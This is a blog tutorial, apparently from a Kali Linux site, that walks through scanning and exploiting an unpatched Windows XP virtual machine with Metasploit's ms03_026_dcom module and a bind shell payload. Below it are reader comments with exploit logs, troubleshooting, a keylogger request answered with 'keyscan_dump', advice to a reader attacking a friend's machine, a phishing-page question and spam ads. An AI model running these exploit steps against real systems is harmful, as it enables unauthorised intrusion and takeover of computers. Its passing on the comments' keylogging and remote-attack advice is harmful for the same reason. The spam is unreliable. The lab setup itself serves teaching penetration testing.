Our approach to penetration testing is going to be simple. I already made a post about the ideal way to begin penetration testing. But we aren't going to ideal way. I'm gonna teach you penetration testing the way I learnt it. By doing actual penetration and exploitation. We can't hack completely patched Windows 7 or Windows 8 right in the first tutorial, but we can definitely hack an unpatched Windows XP machine. However, to do that, you need to victim machine. Testing this method on someone else's computer is not recommended and is quite illegal. It is strongly advised to create your own virtual machine and test exploits there.What are you going to need
Knowledge
- Basic Penetration testing terms (I recommend that you take a look here, as I'm going to use the terms freely without any explanation here in this tutorial)
- The tough manual way of penetration testing (A large patch of advanced material which will help you become a great pentester if you have the patience to read it all and capability to understand it)
- VMWare tools (Without Vmware tools there is no way you can have a Kali linux (attacker machine) and unpatched XP (target machine) running at the same time in one single computer)
Virtual Machines
- Kali linux ( Click the link for a complete detailed guide)
- Windows XP (After you've followed the tutorial above for installing Kali linux, installing XP on a VM will be a piece of cake, a few screenshots of the process)
Now there is catch in Windows XP. While Kali linux is free, Windows XP is not. So you have to buy one (won't promote piracy here). Just make sure that when you are buying a Windows XP cd, it is unpatched and SP1. If it is patched then the exploits won't work. Your best bet would be to look up your shelves to find an old XP cd that you bought years ago which is catching dust, and put it to some use.
A look at Metasploit Framework
Starting the framework
"In keeping with the Kali Linux Network Services Policy, there are no network services, including database services, running on boot so there are a couple of steps that need to be taken in order to get Metasploit up and running with database support." Simply speaking, there are some services that metasploit needs which aren't started with system startup. So here's some commands you need to execute on your console before you can start metasploit
service postgresql start(Metasploit uses PostgreSQL as its database so it needs to be launched first.)
With PostgreSQL up and running, we next need to launch the metasploit service. The first time the service is launched, it will create a msf3 database user and a database called msf3. The service will also launch the Metasploit RPC and Web servers it requires.
service metasploit startUpdate : On recent versions of Kali, you can skip the above two commands, and start with the command below right away. If you are getting an error in above commands, then just skip them.
Now finally we are ready to start metasploit framework.
msfconsole
Looking at the targets
Right now, my metasploit framework is running on Kali on Vmware on a Windows 8 machine. Also, there is a Windows XP Sp3 virtual machine running side my side with my Kali. So what we need to do is detect these machines in Metasploit framework. For this we'll do a port scan.Port Scan
Metasploit offers an awesome port scanning function which goes by the name auxiliary scanner. Here is the command to execute this scan
To use this feature, enter the following code-
use auxiliary/scanner/portscan/tcpType show options to see the available options
show optionsNow we have to change a few settings, firstly, we should reduce the number of ports scanned
set ports 1-500Secondly, we have to specify a target IP to scan. Now this is a bit tricky, as the IP is not going to be the same in all cases. So here's what you'll do. Go to your XP virtual machine (the one you are trying to hack). Open command prompt and type
ipconfigIn the results, check the IP of the machine. This is what you'll have to specify the RHOSTS option as.
In my case the IP is 192.168.63.131
Now go back to your Kali machine, and type the fol (change the IP as required)
set RHOST 192.168.63.131Here's what it should look like
 |
| There's a slight error here, I spelled RHOSTS wrong. Make sure you add the 's' in the end. |
Now we are ready for some action, do a show options again to see what all changes you've made. Finally, type-
runThe scan will start and after some time it will show you which tcp ports are open and vulnerable to attack.
If you had not been using an unpatched version of Windows, there will not be any vulnerable ports.
I got 3 open ports this time. If you are using some higher XP version, you too might need to disable firewall in order to get open ports.
Now we know we have a target at IP 192.168.63.131 and it has port 135 139 and 445 open.
Real life port scan
In actual pentesting environment, you don't know about the IP, open ports and OS of the target computer. In such cases, we can use Nmap port scanner which is much better than auxiliary. We'll come to that later.Finding Exploits
This step is important. We need to figure out which exploits work on the OS we are attacking. In our case, we already know what to do. Type back to get out of auxiliary scanner. Search for dcom on msfconsole.search dcomThis is a very famous exploit for Windows.
use exploit/windows/dcerpc/ms03_026_dcomYou are now using the most famous Windows exploit. Type show options again
show optionsAgain, set the RHOST as 192.168.63.131 (replace with the IP of your target)
set RHOST 192.168.63.131Also, set a payload.
set PAYLOAD windows/shell_bind_tcp
And here's the best part
exploit
You have now successfully broken into the target computer. You have an open shell on the target computer with administrator privileges. In short, you own that computer now. Try out what all you can do from here on. I'll come up with more in the next tutorial.
Update - The next tutorial is here. It discusses the post exploitation fun that you can have with the meterpreter payload. Post exploitation fun in an exploited xp machine
We have a pentesting lab now and have successfully exploited an XP machine.
Thanks for letting us know. The explanation of various type of virtual networking is really lucid and detailed.
ReplyDeleteIf it is not clear enough, you have to substitute remote_host with the IP of your target XP machine, the one you were successfully pinging.
ReplyDeletehello...:p i have a problem my ip that use for facebook fake page ..as adress thats not work on other computer but on my computer thats easly work why ?? am Using VM ........kali linux
ReplyDeleteI don't understand your problem. Please elaborate, give more details. I don't see what is the use of Facebook fake page IP in this pentesting tutorial.
Deletedude you are running your fake page under a local ip, you aren't forwarding the right ports probably.
Deletethat and whatever you decide to run your fake FB page, you will need to buy the right domain which I am sure someone has already purchased.
I have kali-linux and win xp (unpatched) using VMware using NAT connections both communicate fine with each other (seemingly) I can find open ports on unpatched xp VMware using use auxiliary/scanner/portscan/tcp. But when i run exploit. nothing happens. no cmd box opens on xp. nothing at all. ive followed your instructions. i turned off automatic updates of xp after installation xpion finished. i also turned off firewall. im unsure why it has not worked. can you help
ReplyDeletesame here. can you help please? -l doesn't work
Delete[*] Sending exploit ...
ReplyDeletemsf exploit(ms03_026_dcom) > run
[*] Started bind handler
[*] Trying target Windows NT SP3-6a/2000/XP/2003 Universal...
[*] Binding to 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:0.0@ncacn_ip_tcp:192.168.**.**[135] ...
[*] Bound to 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:0.0@ncacn_ip_tcp:192.168.**.***[135] ...
[*] Sending exploit ...
msf exploit(ms03_026_dcom) > -l
[-] Unknown command: -l.
msf exploit(ms03_026_dcom) > -l
[-] Unknown command: -l.
msf exploit(ms03_026_dcom) > sessions -i 1
[-] Invalid session id
msf exploit(ms03_026_dcom) > show options
Module options (exploit/windows/dcerpc/ms03_026_dcom):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOST 192.168.44.138 yes The target address
RPORT 135 yes The target port
Payload options (windows/shell_bind_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique (accepted: seh, thread, process, none)
LPORT 4444 yes The listen port
RHOST 192.168.44.138 no The target address
Exploit target:
Id Name
-- ----
0 Windows NT SP3-6a/2000/XP/2003 Universal
msf exploit(ms03_026_dcom) >
Nothing wrong with the ping. And the netapi method works. I have cmd prompt now.
DeleteI've the same problem as this one.
DeleteI've turned off my firewall and i can ping my XP from kali and vice versa.
i've tried using both dcom and netapi, but in both cases i got stuck..
in case of dcom i'm stuck at this point.
[*] Sending exploit ...
and in case of netapi i'm stuck at this point
[*] Attempting to trigger the vulnerability...
No error whatsoever.. Please Please Please help me...
Thanx but where can i get my hands on an unpatched windows xp.. i've searched but no success...
DeleteI'm not sure where to get it. I myself had a tough time getting one. Try downloading a XP SP1. It's likely to be unpatched.
Deleteinstead of "exploit" put "check" tu review if is vurnebal
DeleteYou need to get through the Port 139 if you got until here but can't create a session. To do this just use as Exploit "ms08_067_netapi" and do the same steps you've done after setting the exploit and it should work perfectly fine. I hope i was able to help you.
Delete~BlackJack
Hey, I tried to run this exploit and it seemed to work perfectly (I did have to disable the firewall on my XP) my only problem was at the very end, It didn't give me any errors but I dont get anything after the exploit has been used, I just get "msf exploit(ms03_026_dcom) >" after not the windows shell I expect, did I miss a step? I tried this 3 times restarting both machines twice. Could It be becuase I am using service pack two? I am able to ping them both.
ReplyDelete~Firepyro
Look at the comment above. The guy had the same problem. Using netapi instead of MS03 helped solve the issue. SP2 might not be vulnerable to MS03.
DeleteOh, whoops I passed over that one xD Thanks for responding so quickly! Sorry for the dumb question.
Delete~Firepyro
No its all right. Questions like these help others when they face similar issues.
DeleteI have the same problem.
DeleteCould you please tell me what's the netapi method ?
Bit of an off topic question, I want to make some of this automatic, if I would use batch in windows what would be the Kali Equivalent?
ReplyDeleteThank you, this helped alot!
DeleteTurn off your firewall, disable your Antivirus (if any). Make sure the vulnerability is not already patched in your system.
ReplyDeletefrom start to exploit it work perfect but my question is how can i access to victim pc files and how can i install some thing like keylogger please help me
ReplyDeleteregards osama asghar :)
thanks
Deleteand last thing that can we keylog google chrome meterpreter> keyscan_dump
DeleteIs there any way for me to check if my XP system has already been patched? I am feeling like this is the problem as I have already tried reverse_tcp as well as meterpreter. I found that my virtual network may not be configured the best that it can be...would you recommend a host only?
ReplyDeleteBy the way, was your site format changed or something?
ReplyDeleteAnd yeah, I changed the design of my website. It has done more harm than good though, as my search rankings dropped overnight, and traffic dropped from 2K visits/day to 1K/day.
ReplyDeleteI really like the site as far as content goes. The new layout did throw me off, but that's no problem. I am fairly certain that the exploits will not work because I downloaded XP from Microsofts free VM files so it's likely patched to hell. I have been using Metasploitable 2 and its been pretty cool; I'm able to gain control over the command prompt using Armitage, but after messing with Armitage a little bit more, I don't see how someone would not be able to use it successfully with Metasploitable. I hope to see more tutorials on more recent operating systems soon!
ReplyDeleteThe layout hasn't been appreciated by the visitors, nor by the search engine spiders. I think I'll change it.
ReplyDeleteJust letting ya know, I think the new layout is interesting, but it's hard for me as a beginner to really understand or see a linear layout of where to go from. That may be what mainly threw people off. At first I thought I was on the wrong site. lol
ReplyDeleteI have a copy of XP. Using VM or virtual box I would normally use an ISO image. Is there a way to convert my copy of XP to an ISO image ?
ReplyDeleteIt would be great if you could be more specific. What do you mean by 'having a copy of XP'. If you mean that you don't have the installation ISO, but the installed files on a system, then you can use vmware vcenter converter. Let me know more details of your situations so I can give a specific answer.
DeleteSorry. I mean by copy, I have it on a disc, original Microsoft XP disc. Can I copy it to a format, i.e, ISO image.
ReplyDeleteUse daemon tools. They have an option to save the content from CD or DVD as an isolated file. I think alcohol 120 also provides the same functionality.
ReplyDeleteSorry autocorrect converted iso to isolated.
DeleteAny idea on this?
DeleteAfter exploit command
Started bind handler
--- Exploit completed, bu no session was created
""msf exploit(ms03_026_dcom) > set RHOST 192.168.148.131
RHOST => 192.168.148.131
msf exploit(ms03_026_dcom) > set PAYLOAD windows/shell_bind_tcp
PAYLOAD => windows/shell_bind_tcp
msf exploit(ms03_026_dcom) > exploit
[*] Started bind handler
[*] Trying target Windows NT SP3-6a/2000/XP/2003 Universal...
[*] Binding to 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:0.0@ncacn_ip_tcp:192.168.148.131[135] ...
[*] Bound to 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:0.0@ncacn_ip_tcp:192.168.148.131[135] ...
[*] Sending exploit ...
[*] Exploit completed, but no session was created.
msf exploit(ms03_026_dcom) >
""
Thank you. It will be more practical converted to an ISO image. I can then store it on a usb with my many other ISO images of various operating systems.
ReplyDeleteI think the appearance of your site is great. There is no such thing as perfect. I arrive and leave a little wiser, that in my book is a success and a site worth bookmarking. 10 out of 10.
Thanks for the positive feedback.
Deletethere is something similar for windows 8
ReplyDeleteo windows 7
ReplyDeleteNeed help I got all the way to exploiting , had to change the target port because 135 wouldn't work , but after all that it failed to bind. Help!!
ReplyDeleteMy Both Xp & Kali Showing Same Ip adress please Help
ReplyDeleteperhaps u r usng vBox of oracle, thats why u have same ip on both machines........ same case was mine....so I started usng vm-ware
ReplyDeleteI read the conversation...... same problem with me. Can't get into xp...... same as urs
Delete[*] Started bind handler
[*] Trying target Windows NT SP3-6a/2000/XP/2003 Universal...
[*] Binding to 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:0.0@ncacn_ip_tcp:192.168.80.129[135] ...
[*] Bound to 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:0.0@ncacn_ip_tcp:192.168.80.129[135] ...
[*] Sending exploit ...
msf exploit(ms03_026_dcom) >
I am again in msf rather than in cmd of xp...
Did anyone figured it out?? pls do help
Ive the same problem, still dont understand it...
Deletei hacked xp using windows/meterpreter/reverse_tcp but its working for virtual box only!!!!!!!!!
ReplyDeleteWhen i am trying to hack my friend system (He Know It) its not connecting????
stuck at [*] Starting the payload handler.....
are you sure you are using his public ip instead of his home ip?
Deleteand is it his ip or his isp's dns' ip or his real ip?
Thanks for the author. I finish this tutorial. For your information, I have some problems from installing Kali Linux which you post at --> http://kalitutorials.net/2014/02/complete-detailed-guide-on-installing.html
ReplyDeleteIf I follow your steps by steps, in step 14, the screen show 'Network autoconfiguration failed', and your advice is to choose 'Do not configure the network at this time', and that made the problems. You cannot ping to anywhere. The solution is easy, in step 8, in Network Adapter, select NAT, that's all. Hope this post will be useful for some guys :)
I am attempting the netapi exploit on a pirated windows 7 (not a VM) on SP1. After digging around through different payloads, meterpreter works the best, but it still failed. I had everything set, RPORT was 445 (neither 135 or 139 will work), RHOST was 10.0.0.15, LHOST was 10.0.0.16, and LPORT was 4444.
ReplyDeleteHere's what happened:
[*] Started reverse handler on 10.0.0.16:4444
[*] Automatically detecting the target...
[*] Fingerprint: Windows 7 - Service Pack 1 - lang:Unknown
[*] We could not detect the language pack, defaulting to English
[-] Exploit aborted due to failure: no-target: No matching target
msf exploit(ms08_067_netapi) >
Any help???
You should try exploiting XP first. You're jumping way ahead of the tutorial.
DeleteHelp , I've tried both the netapi and the dcom method but at the end the result is
ReplyDelete" Exploit failed: the following options failed to validate: RHOST.
msf exploit(ms08_067_netapi) > " . Please help at the earliest !
Failed to start metasploit.service : Unit metasploit.service failed to load: no such file or directory.
ReplyDeleteI get this error after giving the command "service metasploit start" , I have searched online for solution but found none, can you help me.
the way to start metasploit has been changed. check this link:
Deletehttps://www.kali.org/news/kali-linux-20-released/
# Start the Postgresql Database
/etc/init.d/postgresql start
# Initialize the Metasploit Framework Database
msfdb init
# Run msfconsole
msfconsole
How would we do this manually? In this tutorial we let the tools do all the work, but how would I as a complete newbie at this do all of this manually/use as little tools as possible. I'd like to actually understand how it all works
ReplyDeleteExploit failed [unreachable]: Rex::ConnectionRefused The connection was refused by the remote host (IP Address) What does this mean?
ReplyDeleteafter "[*] sending exploit"... i am redirected to "msf exploit(ms03_026_dcom) > "
ReplyDeletewhy is that?
after "[*] sending exploit"... i am redirected to "msf exploit(ms03_026_dcom) > "
ReplyDeletewhy is that?
Exploit failed : Rex: : Porto: : dcerpc : : exception:: invalid packet invalid packet. DCERPC response packet is imcomplet
ReplyDeleteWhat does this mean ? How do I fix it ?
same issue for me as well .redirected back to msf console insted of xp command window.
ReplyDeleteAny help would be appreciated author
no use in hacking a XP workstation anyway, especially nowdays. Everybody use WIN7 or greater.
ReplyDeletehello, when i run the exploit i get this:
ReplyDelete[*]Started bind handler
[*]Trying target Windows NT SP#-6a/2000/XP/2003 Univesal...
[*]Biding to "some numbers":0.0@ncacn_ip_tcp:"ip adress[port]"
[-]Exploit failed: Rex::Proto::DCERPC::Exceptions::InvalidPacket invalid PAcket. DCERPC response packetis incomplete
did i get something wrong??
thx 4 the help
nyc 1 Thxxx
ReplyDeleteit says exploit completed, but no session was created. how do i fix this
ReplyDeletesame here, both with tcp and netapi
DeleteLOL very new to this i got all the way without really reading the scan i have a really old XP Sp3 machine that i threw up. The scan came back with two open ports 445 and 139 not 135 like yours above so my exploit didn't work. Told me exploit failed i'm assuming because it likes port 135. I tried loading another module at windows/smb/ms04_0331_netdde and it keeps failing. Are there more modules to try? I did the com search command but it only came up with the ones you have.
ReplyDeleteSP3 is patched and you need an unpatched version of XP
DeleteHi all,
ReplyDeleteI do not got the port step. why do we need to set the number of ports and not leave it as default and why we are not use them (we just have to make sure there are exist?).
THX, Amit
can you do a tutorial on how to hack mac
ReplyDeleteI can't seem to be able to get any of the ports open. I have disabled the Windows Firewall and added exceptions for the ports you got open but nothing I do seems to work. Please suggest any ideas that could help me get a port open. I tried an Nmap scan and the first time I did it it said port 80 was open but when I scanned again it said it was filtered.
ReplyDeleteI forgot to mention I have Windows XP Pro SP3.
DeleteAlso, I don't know if this helps, but I'm running it on Windows XP Mode on a Windows 7 PC I have.
Deletemsf > use auxilary/scanner/portscan/tcp
ReplyDelete[-] Failed to load module: auxilary/scanner/portscan/tcp
please help i'm stuck at this level
I would like to get remote access to a router which is 300 miles away, I have the password, MAC address, user name for the router, password for the router,IP address for the router, all the router settings I just don't know how to connect to it, Its my sisters router and she knows I am trying to do this with Kali Linux as to learn more about pen testing.
ReplyDeleteAny help would be most appreciated.
Thanks in advance.
I would like to get remote access to a router which is 300 miles away, I have the password, MAC address, user name for the router, password for the router,IP address for the router, all the router settings I just don't know how to connect to it, Its my sisters router and she knows I am trying to do this with Kali Linux as to learn more about pen testing.
ReplyDeleteAny help would be most appreciated.
Thanks in advance.
THIS IS VERY INTERESTING QUE.. PLZ RESP AUTHOR.. REPLY APPRECIATED..
HI, Im new bie to metasploit. After i run this tutorial I get "exploit completed but no session was created"
ReplyDeleteOS is Windows 7
when i start the exploit windows xp machine shuts down. i get the system shutdown window showing this error "windows must now restart because remote procedure call (RPC) service terminated unexpectedlly"
ReplyDeleteAny idea on this?
ReplyDeleteAfter exploit command
Started bind handler
--- Exploit completed, bu no session was created
""msf exploit(ms03_026_dcom) > set RHOST 192.168.148.131
RHOST => 192.168.148.131
msf exploit(ms03_026_dcom) > set PAYLOAD windows/shell_bind_tcp
PAYLOAD => windows/shell_bind_tcp
msf exploit(ms03_026_dcom) > exploit
[*] Started bind handler
[*] Trying target Windows NT SP3-6a/2000/XP/2003 Universal...
[*] Binding to 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:0.0@ncacn_ip_tcp:192.168.148.131[135] ...
[*] Bound to 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:0.0@ncacn_ip_tcp:192.168.148.131[135] ...
[*] Sending exploit ...
[*] Exploit completed, but no session was created.
msf exploit(ms03_026_dcom) >
""
I get this error when i hit exploit "Exploit failed [unreachable]: Rex::ConnectionTimeout The connection timed out(remote host ip)"
ReplyDeleteI have disabled the firewall on the xp virtual machine i tried to attack.I have also stoppe d the automatic updates.Can anyone help me?Thanks
I should also say that the ip from the kali linux virtual machine is the same as the xp one.
DeleteThe IPs should not be same. Maybe you are looking at the external IP, not the internal one.
DeleteSo once I run the exploit it "works successfully" but I don't get any return for the opened shell. I type exploit, I get no error messages and it says the exploit worked but it just hangs after that with no possible command input.
ReplyDeleteAny idea what I could have done wrong?
Never mind. I just dicked with it and got it to work with NETAPI instead of DCOM.
DeleteWell, nobody's posted here in a few months so I thought I'd throw my 2 cents in.
ReplyDeleteI'm Using VBox
Windows XP Pro SP2
Kali
Metaspoitable
My ips are the same for Kali, Metasploitable and WinXP
I checked multiple times. Released/Renewed. Rebooted all
My Results (Similar if not identical to a lot of people here)
msf exploit(ms03_026_dcom) > exploit
[*] Started bind handler
[-] 10.0.2.15:135 - Exploit failed [unreachable]: Rex::ConnectionRefused The connection was refused by the remote host (10.0.2.15:135).
[*] Exploit completed, but no session was created.
msf exploit(ms08_067_netapi) > exploit
[-] 10.0.2.15:445 - Exploit failed: The following options failed to validate: LHOST.
[*] Exploit completed, but no session was created.
Windows Defender is OFF
Turned it on and excepted port 135. No joy.
Kali
root@kali2:~# ifconfig
eth0: flags=4163 mtu 1500
inet 10.0.2.15 netmask 255.255.255.0 broadcast 10.0.2.255
inet6 fe80::a00:27ff:fe41:5816 prefixlen 64 scopeid 0x20<'link'>
ether 08:00:27:41:58:16 txqueuelen 1000 (Ethernet)
RX packets 10 bytes 1451 (1.4 KiB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 30 bytes 2635 (2.5 KiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
lo: flags=73 mtu 65536
inet 127.0.0.1 netmask 255.0.0.0
inet6 ::1 prefixlen 128 scopeid 0x10
loop txqueuelen 1 (Local Loopback)
RX packets 110964 bytes 28478906 (27.1 MiB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 110964 bytes 28478906 (27.1 MiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
XP
C:\>ipconfig /all
Windows IP Configuration
Host Name . . . . . . . . . . . . : kali-b977d85904
Primary Dns Suffix . . . . . . . :
Node Type . . . . . . . . . . . . : Unknown
IP Routing Enabled. . . . . . . . : No
WINS Proxy Enabled. . . . . . . . : No
DNS Suffix Search List. . . . . . : cg.shawcable.net
Ethernet adapter Local Area Connection:
Connection-specific DNS Suffix . :
Description . . . . . . . . . . . : Intel(R) PRO/1000 MT Desktop Adapter
Physical Address. . . . . . . . . :
Dhcp Enabled. . . . . . . . . . . : Yes
Autoconfiguration Enabled . . . . : Yes
IP Address. . . . . . . . . . . . : 10.0.2.15
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 10.0.2.2
DHCP Server . . . . . . . . . . . : 10.0.2.2
DNS Servers . . . . . . . . . . . : 64.59.135.148
64.59.128.114
Lease Obtained. . . . . . . . . . : Friday, March 31, 2017 8:43:13 PM
Lease Expires . . . . . . . . . . : Saturday, April 01, 2017 8:43:13 PM
Sploit is similar to Kali in output but the ip is the same.
Your post back on Oct 8 said the ips should be different. I've made numerous attempts to get this to work.
I'm at the point of giving up as I think the problem is the ip...all being the same. Unless I've missed something basic, I have to go in a different direction.
try setting static ips in your kali, metasploitable and winxp
Deletethis is an extremely basic step and i am surprised that the router (or you) assigned the same ips to different devices, i assume your router identifies your devices with ipv6 or mac num
What's a safe page to download the Windows XP iso file?
ReplyDeleteWell for me it says at the end of the exploit : Exploit completed, but no session was created. How do you fix/bypass that
ReplyDeleteIf you get this error: Auxiliary failed: Msf::OptionValidateError The following options failed to validate: RHOSTS.
ReplyDeleteYou are typing something wrong in your set command. This Tutorial says to use:
set RHOST xxx.xxx.xxx.xxx (ip)
and in fact it should be:
set RHOSTS xxx.xxx.xxx.xxx (ip)
Minor syntax error that will fail the query.
"Gordon Brown admits data losses may be inevitable"... "Lost data official to be charged"... "MI6 photos 'sold on auction site'"... "Discs loss 'entirely avoidable'"... "Fresh benefit data lapse admitted"... "Firm 'broke rules' over data loss"... "More firms 'admit disc failings'"...
ReplyDeleteWashington DC escorts
Hey, i just got in this hole stuff and got to the point with the exploit. When i typed it in it says "Exploit completed, but no session was created." (it was just like in the tutorial). After that i thought, hm... k it probably isnt working with dcom and shell_bind_tcp so use netapi and meterpeter like in the next tutorial, but when i used netapi and meterpeter it says at the beginning "Handler failed to bind to XXX.XXX.XXX.XX:XXXX" and at the end it still says "Exploit completed, but no session was created.".....pls help .----.
ReplyDeleteThe permit permits the holder/driver to work a Yellow Medallion Taxicab in the Five Boroughs of the City of New York. Just a Yellow Medallion Taxicab is allowed to get travelers hailing from the road in the City.Techpally hacking articles
ReplyDeleteVery detailed and useful post. It seems a lie, but nowadays there are millions of computers still using Windows XP therefore this practice can be useful. For those who use XP, the only thing they can do is use a good antivirus
ReplyDelete.
We will be getting a reverse TCP connection from the victim machine by using a small backdoor hack windows 7 using metasploit.
ReplyDeleteI got an error at last
ReplyDeleteMy steps were ::
**********************************************************************
Service postgresql start
Service Metasploit start(it doesnt work)
msfconsole
*********** PORT SCAN *************
Use auxiliary/scanner/portscan/tcp
Show options
Set ports-1-500
21, 135, 139, 445
setRHOST (IP[windows])
run
******************* Finding Exploits **************
Search dcom
Use/exploit/windows/dcerpc/mc03_026_dcom
show options
set RHOSTS 192.168.63.131
set PAYLOAD windows/shell_bind_tcp
exploit
********************
msf6 exploit(windows/dcerpc/ms03_026_dcom) > set PAYLOAD windows/shell_bind_tcp
PAYLOAD => windows/shell_bind_tcp
msf6 exploit(windows/dcerpc/ms03_026_dcom) > exploit
[*] 192.168.193.3:135 - Trying target Windows NT SP3-6a/2000/XP/2003 Universal...
[*] 192.168.193.3:135 - Binding to 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:0.0@ncacn_ip_tcp:192.168.193.3[135] ...
[*] 192.168.193.3:135 - Bound to 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:0.0@ncacn_ip_tcp:192.168.193.3[135] ...
[*] 192.168.193.3:135 - Sending exploit ...
[*] Started bind TCP handler against 192.168.193.3:4444
[*] Exploit completed, but no session was created.
did i miss something ?
I got an error at last
ReplyDeleteMy steps were ::
**********************************************************************
Service postgresql start
Service Metasploit start(it doesnt work)
msfconsole
*********** PORT SCAN *************
Use auxiliary/scanner/portscan/tcp
Show options
Set ports-1-500
21, 135, 139, 445
setRHOST (IP[windows])
run
******************* Finding Exploits **************
Search dcom
Use/exploit/windows/dcerpc/mc03_026_dcom
show options
set RHOSTS 192.168.63.131
set PAYLOAD windows/shell_bind_tcp
exploit
********************
msf6 exploit(windows/dcerpc/ms03_026_dcom) > set PAYLOAD windows/shell_bind_tcp
PAYLOAD => windows/shell_bind_tcp
msf6 exploit(windows/dcerpc/ms03_026_dcom) > exploit
[*] 192.168.193.3:135 - Trying target Windows NT SP3-6a/2000/XP/2003 Universal...
[*] 192.168.193.3:135 - Binding to 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:0.0@ncacn_ip_tcp:192.168.193.3[135] ...
[*] 192.168.193.3:135 - Bound to 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:0.0@ncacn_ip_tcp:192.168.193.3[135] ...
[*] 192.168.193.3:135 - Sending exploit ...
[*] Started bind TCP handler against 192.168.193.3:4444
[*] Exploit completed, but no session was created.
did i miss something ?
The Widespread tensile testing machine assists with building up the flexibility of metal. tensile machine
ReplyDeleteAivivu chuyên vé máy bay, tham khảo
ReplyDeleteve may bay di my gia re
vé máy bay từ mỹ về vn
các đường bay từ canada về việt nam
vé máy bay từ nhật về việt nam
vé máy bay từ hàn về Việt Nam
Vé máy bay từ Đài Loan về Việt Nam
khách sạn cách ly tại hà nội
During their fellowship, sports medicine practitioners learn about different types of athletic injuries and how they can be treated. These doctors require a two-year residency, and these physicians must renew their license every 10 years. In addition to residency, aspiring sports medicine practitioners may choose to work for a professional sports team, university athletic program, or fitness club. They can practice as a primary care physician. Although the training to become a sports medicine physician is quite extensive, it is certainly valuable. Here is information about sports medicine physician, read on for more information.
ReplyDeleteIn case you are asking if is real if the Neco exam Questions paper leaks? Or does the Neco examination Questions paper leak for 2023? Or do the Neco exam goal and theory Questions paper leak? The answer is sure, Neco examination Questions do Leak. Sure, you'll be surprised to pay attention us say Neco examination Questions do leak. Right here's information approximately correct neco midnight expo, greater info study directly to understand.
ReplyDeleteDiscover the allure of gold jewellery in bangladesh. Our stunning gold and diamond jewelry collection features rings, necklaces, and more, offering timeless elegance and contemporary style for every occasion.
ReplyDeleteKing Umbrella, a well-known manufacturer in Bangladesh, specializes in manufacturing umbrellas, raincoats and bags. Strengthen your brand presence by customizing these premium items with your logo for a unique touch. Read the full info here Umbrella Company Bangladesh.
ReplyDelete